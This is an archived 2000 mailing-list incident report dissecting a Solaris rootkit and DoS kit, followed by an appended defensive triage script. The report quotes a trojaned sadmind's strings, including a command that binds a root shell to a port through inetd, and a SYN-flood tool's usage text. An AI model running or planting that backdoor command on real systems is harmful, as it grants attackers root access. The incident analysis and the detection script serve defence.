Security Incidents mailing list archives
Solaris DoS kit
From: Elias Levy <aleph1 () SECURITYFOCUS COM>
Date: Tue, 22 Aug 2000 12:35:29 -0700
[ This message is from an anonymous contributor ]

This was used by a btinternet user against www.amazon.com via one of our Solaris 2.6 servers. Expect they got in via an old sadmind vulnerability which wasn't patched on a server which really should have been behind a firewall.

Most of this is pretty uninteresting, wipe is just a utmp/wtmp wiper for example. The kit adds telnetd to /etc/inetd.conf, removes sadmind from /etc/rpc and adds it to /etc/init.d/rpc and installs a bogus sadmind binary which is used for denial of service attacks. The DoS type is spoofed source random tcp-high to tcp-high on target host.

bash-2.01# tar tvf solkit.tar
-rw-r--r-- 0/0 109 Jul 1 08:50 2000 path.sh
-rw-r--r-- 0/0 34300 Jul 28 03:04 2000 sadmind
-rw-r--r-- 0/0 130 Jul 1 08:49 2000 secure.sh
-rw-r--r-- 0/0 6936 Jul 1 03:25 2000 set
-rw-r--r-- 0/0 29464 Jul 20 06:29 2000 stream
-rw-r--r-- 0/0 32560 Jul 1 03:25 2000 wipe

bash-2.01# cat path.sh
PATH=/bin:/usr/bin:/usr/sbin:usr/ucb/bin:/usr/local/bin:/usr/opt/local/bin:/usr/ccs/bin:/opt/public/bin:. ;

bash-2.01# cat secure.sh
kill -9 ` ps -ef | grep "/inetd -s /tmp" | awk '{print $2} '`
kill -HUP `ps -ef | grep " /usr/sbin/inetd -s" | awk '{print $2} '`

bash-2.01# strings sadmind
-csh
fawking into background || coded by blazinweed || blazinweed () stoned com
socket
bind
listen
accept
%s %s %s %s %s
ld.so.1
wrong pass
/bin/echo '%s stream tcp nowait root /bin/sh sh -i'> /tmp/.h;/usr/sbin/inetd -s /tmp/.h &
ingreslock
PONG
Could not resolve %s.
jess
setsockopt
flooding target

bash-2.01# strings stream
Usage: %s <dstaddr> <dstport> <pktsize> <pps>
dstaddr - the target we are trying to attack.
dstport - the port of the target, 0 = random.
pktsize - the extra size to use. 0 = normal syn.
Could not resolve %s.
jess
stream.c v1.0 - TCP Packet Storm
socket
setsockopt
Resolving IPs...
Sending...

----- End forwarded message -----

--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum
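Added example, not part of the original post or of the kit: a triage sketch for two indicators quoted in the strings output above, an inetd entry that binds a root shell to a port and a second inetd started against a config file such as /tmp/.h. The function names, the sample data, the use of ingreslock as the service name filled into the %s, and /etc/inetd.conf as the only expected config path are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: triage for two indicators named in the report above.
# All sample input below is constructed, modelled on strings quoted in the post.

# inetd.conf-style input on stdin: print entries that hand a root shell to
# whoever connects (field 5 = user, field 6 = server program).
find_shell_services() {
    awk '!/^[ \t]*#/ && NF >= 6 && $5 == "root" &&
         $6 ~ /\/(sh|csh|ksh|bash)$/ { print }'
}

# `ps -ef` output on stdin: print inetd processes that were given a
# configuration file other than /etc/inetd.conf (assumed to be the stock path).
find_rogue_inetd() {
    awk '{ for (i = 1; i <= NF; i++) if ($i ~ /(^|\/)inetd$/) {
               for (j = i + 1; j <= NF; j++)
                   if ($j ~ /^\// && $j != "/etc/inetd.conf") { print; next }
               next } }'
}

sample_conf() {   # constructed: two ordinary entries plus a backdoor-style line
    cat <<'EOF'
# constructed sample
ftp        stream tcp nowait root /usr/sbin/in.ftpd    in.ftpd
telnet     stream tcp nowait root /usr/sbin/in.telnetd in.telnetd
ingreslock stream tcp nowait root /bin/sh sh -i
EOF
}

sample_ps() {     # constructed: the stock inetd and a second copy using /tmp/.h
    cat <<'EOF'
     UID   PID  PPID  C    STIME TTY      TIME CMD
    root   177     1  0   Jul 01 ?        0:03 /usr/sbin/inetd -s
    root  4412     1  0 03:04:11 ?        0:00 /usr/sbin/inetd -s /tmp/.h
    root  4500  4412  0 03:05:02 ?        0:00 grep inetd
EOF
}

echo "== root-shell services =="
sample_conf | find_shell_services
echo "== inetd with non-default config =="
sample_ps | find_rogue_inetd
```

On a live host the same functions read `/etc/inetd.conf` (and any config file the second check turns up) and the output of `ps -ef`. Results from a host already suspected of compromise should be compared against a trusted copy of the binaries, since the kit replaces system programs.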